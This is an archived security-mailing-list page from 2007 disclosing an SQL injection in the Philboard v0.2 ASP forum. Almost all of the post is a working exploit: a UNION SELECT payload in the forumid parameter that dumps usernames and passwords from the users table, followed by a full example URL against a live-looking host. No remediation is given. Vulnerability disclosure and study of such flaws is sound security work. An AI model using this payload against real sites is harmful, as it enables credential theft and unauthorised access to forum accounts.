Computer Security
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  [Full-disclosure] Teamspeak Server 2.0.20.1 Vulnerabilities

  Multiple Denial of Service attacks possible for Webspeed OpenEdge

  eFileCabinet Authentication Bypass

  fotolog xss

From:ALEMIN KRALI <by_gsy_(at)_hotmail.com>
Date:12.05.2007
Subject:W1L3D4 Philboard v0.2 sql injection

Discovered by: gsy & kerem125
Website: www.kerem125.com

script download:http://www.aspindir.com/indir2.asp?id=4891&sIslem=%DDndir

exploit:/W1L3D4_bolum.asp?forumid=-99+union+all+select+0,1,2,3,4,5,6,7,8,9,
password,username,12,13,14,15,16,17,18,19,20+from+users

example:
http://philboard.somee.com/W1L3D4_bolum.asp?forumid=-99+union+all+select+0
,1,2,3,
4,5,6,7,8,9,password,username,12,13,14,15,16,17,18,19,20+from+users

contact: by_gsy@hotmail.com & kerem125@kerem125.com
Special thx to:by_emr3 , ercu_145, bolivar, voltigore, mardinli, f10

_________________________________________________________________
Dikkatsiz mesajlasma tehlikelidir!
http://www.communicationevolved.com/tr-tr/

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod
 



Rating@Mail.ru